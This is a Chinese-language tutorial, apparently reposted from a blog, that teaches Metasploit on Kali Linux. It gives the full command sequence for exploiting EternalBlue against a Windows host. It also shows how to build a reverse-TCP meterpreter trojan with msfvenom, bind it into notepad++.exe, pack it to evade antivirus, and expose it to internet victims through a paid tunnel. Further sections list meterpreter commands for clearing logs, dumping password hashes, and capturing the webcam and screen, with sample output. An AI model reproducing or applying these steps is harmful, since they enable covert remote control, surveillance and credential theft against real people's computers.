赞
踩
kali的学习本质是在linux上对一些攻击软件的使用,只是学习的初期
先在终端切换到root用户,以便于有些工具对权限的要求
下载链接
镜像源kali
攻击流程
公网信息搜集
寻找漏洞,突破口,以进入内网
进入内网,对内网有价值信息收集
即 MetaSploit Framework,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。
可以满足渗透测试的全过程
metasploit让复杂的漏洞攻击流程变的非常简单,一个电脑小白经过几小时的学习,就能对操作系统等主流漏洞发起危害性攻击
本质是利用别人开发好的工具,只能对一些老旧系统攻击
如下,模拟使用msf利用永恒之蓝漏洞(因为可以导致蓝屏命名)
在终端输入下面代码启动
msfdb init
msfconsole
可以db_status
查看msf是否连接到postgresql ,用workplace 查看当前工作区
安装路径在/usr/share/metasploit-framework/modules/
其中有以下类型的模块
然后搜索该漏洞的相关渗透工具,每个漏洞都有自己的编号,通过编号搜索,可以在Twitter,github或者微软的安全补丁里面获取较新的漏洞,或者上官网
search ms17_010 # 微软把永恒之蓝漏洞编号为2017年的第10号漏洞
得到
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
其中,exploit攻击工具,auxiliary是辅助工具
输入对应编号来使用模块
use 0
退出
back
然后就是设置参数,下面命令查看有那些需要设置
options
得到下面,然后对每个required为yes的参数进行设置
将Module options设置为目标机器以利用漏洞,Payload options是通过该漏洞执行的实际恶意代码
Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framewor k/wiki/Using-Metasploit RPORT 445 yes The target port (TCP) SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 targe t machines. SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Win dows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target ma chines. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Serve r 2008 R2, Windows 7, Windows Embedded Standard 7 target machines. Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.234.133 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Target
如下设置局域网内的ip地址
set RHOSTS 192.168.234.134
然后执行该模块
run
执行成功后就可以使用meterpreter来执行一些恶意攻击了
输入help可以查看可以执行的指令
如截图,拍照,下载文件等
闲置不用是可以使用exit或background
我们最常使用msfvenom生成远控木马,可以不使用漏洞,执行一些普通权限的操作
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.235.241 lport=9999 -f exe -o Trojan.exe
下面是命令的解释
-venom 毒液
-p payload
/windows/x64/meterpreter/reverse_tcp payload的系统,架构,作用,方式
lhost=192.168.123.136 lport=9999 payload的设置
-f format
exe windows可执行文件
-o output
Trojan.exe 文件名
有木马之后我们需要进行免杀处理。
用于监听目标是否点开木马
使用模块
use exploit/multi/handler
设置参数
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.235.241
set lport 9999
run执行监听
当我们目标机点击了该文件,我们就可以使用meterpreter控制了
捆绑木马
在后面加入-x,以同时打开我们的木马,可以防火绒,不能防360
要植入到64位中
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.136 lport=9999 -f exe -x notepad++.exe -o notepad++.exe
加壳
用于保护软件著作权的,防止被逆向分析,同时也可以用来保护我们的木马
vmp(Virtual Machine Protector)虚拟机壳,有效的
upx(Ultimate Packer for eXecutables)压缩壳,比较简单
我们使用Themida来加vmp壳
上面的测试是基于局域网的,但我们的木马需要在互联网中传播,所以需要使用隧道网络来实现内网穿透
即被控机器发送到隧道服务器,再转发到我们的kali机器上
我们可以使用Sunny-Ngrok内网穿透服务来实现内网穿透
根据教程开通tcp隧道后,绑定kali的本地端口如127.0.0.1:9999用于handler监听
付费开通后,就可以得到隧道id用于在kali上登录,然后通过ping赠送的域名得到ip以便于生成木马
如下
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=27.xxx.xxx.xxx lport=10210 -f exe -o Trojan.exe
下载软件后登录隧道
./sunny clientid 2231xxxxxxx
然后handler绑定127.0.0.1:9999就可以监听了
help :展示帮助菜单
shell:执行目标机器的cmd
background 把当前session放到后台,然后返回‘msf’提示的命令行
session:返回session,使用sessions -i 1
命令选择:
cat 查看文件内容:
cd pwd ls 切换目录,查看当前目录:
clearev 清除Windows上的日志,(Clear Event),Windows上的日志可以使用事件查看器 win+r输入eventvwr来查看
download 从目标机上下载文件,注意路径需要使用两个反斜杠:
download c:\\boot.ini
screenshot 截屏
screenshare 实时监控
webcam_stream 打开摄像头
edit 使用vim 编辑文件:
execute 在目标机器上执行命令,以便后台启动cmd进行操作
meterpreter > execute -f cmd.exe -i -H
getid 返回目标主机的服务器名字:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
search 在目标机上搜索具体的文件,可以在整个系统中搜索,也可以在指定的目录下搜索,在创建文件模式时可以使用通配符。
meterpreter > search -f autoexec.bat
upload 上传文件到目标机上,同download 命令一样在路径中需要使用两个反斜杠:
meterpreter > upload evil_trojan.exe c:\\windows\\system32
hashdump dump出Windows上SAM数据库的内容:
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3:::
dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9:::
victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
meterpreter >
idletime 返回远程主机用户在线的时长:
meterpreter > idletime
User has been idle for: 5 hours 26 mins 35 secs
meterpreter >
ipconfig 查看远程主机的网络配置情况:
meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:10:f5:15
IP Address : 192.168.1.104
Netmask : 255.255.0.0
meterpreter >
migrate 注入到另外一个进程中去:
meterpreter > run post/windows/manage/migrate
[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1076)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)
meterpreter >
ps 列出目标当前正在运行的进程:
meterpreter > ps
Process list
============
PID Name Path
--- ---- ----
132 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe
152 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe
288 snmp.exe C:\WINDOWS\System32\snmp.exe
...snip...
RESOURCE resource 命令会一行一行地执行文本文件里的meterpreter命令,默认情况下,命令是在目标机的当前目录下执行,而resource文件则是在攻击机本地工作目录下。
meterpreter > resource
Usage: resource path1 path2Run the commands stored in the supplied files.
meterpreter >
参数:
path1: 包含要执行的命令的文件的位置
Path2Run: 在文件中找到的执行命令的位置
示例
使用的resource文件如下:
root@kali:~# cat resource.txt
ls
background
root@kali:~#
执行resource命令:
meterpreter> > resource resource.txt [*] Reading /root/resource.txt [*] Running ls Listing: C:\Documents and Settings\Administrator\Desktop ======================================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir 2012-02-29 16:41:29 -0500 . 40777/rwxrwxrwx 0 dir 2012-02-02 12:24:40 -0500 .. 100666/rw-rw-rw- 606 fil 2012-02-15 17:37:48 -0500 IDA Pro Free.lnk 100777/rwxrwxrwx 681984 fil 2012-02-02 15:09:18 -0500 Sc303.exe 100666/rw-rw-rw- 608 fil 2012-02-28 19:18:34 -0500 Shortcut to Ability Server.lnk 100666/rw-rw-rw- 522 fil 2012-02-02 12:33:38 -0500 XAMPP Control Panel.lnk [*] Running background [*] Backgrounding session 1... msf exploit(handler) >
cdn服务,将目标服务器内容备份到就近的边缘服务器,以便于更快,更可靠的访问资源。相当于对服务器资源的缓存
我们使用多地ping可以判断该网站是否开启了cdn服务,如果ip不唯一,多半是开启了的
如何绕过cdn?
C段存活主机探测
即扫描ip地址第3段相同的其他服务器地址,因为申请ip时一般都是申请同一c段的
使用linux的nmap命令进行扫描
也可以使用工具 CWebScanner
git clone https://github.com/se55i0n/Cwebscanner.git
端口
根据服务类型不同,分为tcp和udp端口
我们攻击就是针对不同的端口
网站架构(操作系统、中间件、数据库、编程语言)、
指纹信息.WAF、敏感目录、敏感文件、源码泄露、旁站查询、C段查询
子域名越多,也容易找到漏洞
kali可以直接命令行whois baidu.com
查询信息
子域名
site:bilibili.com
详情看下面谷歌黑客domain="baidu.com"
该网站是收费的Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。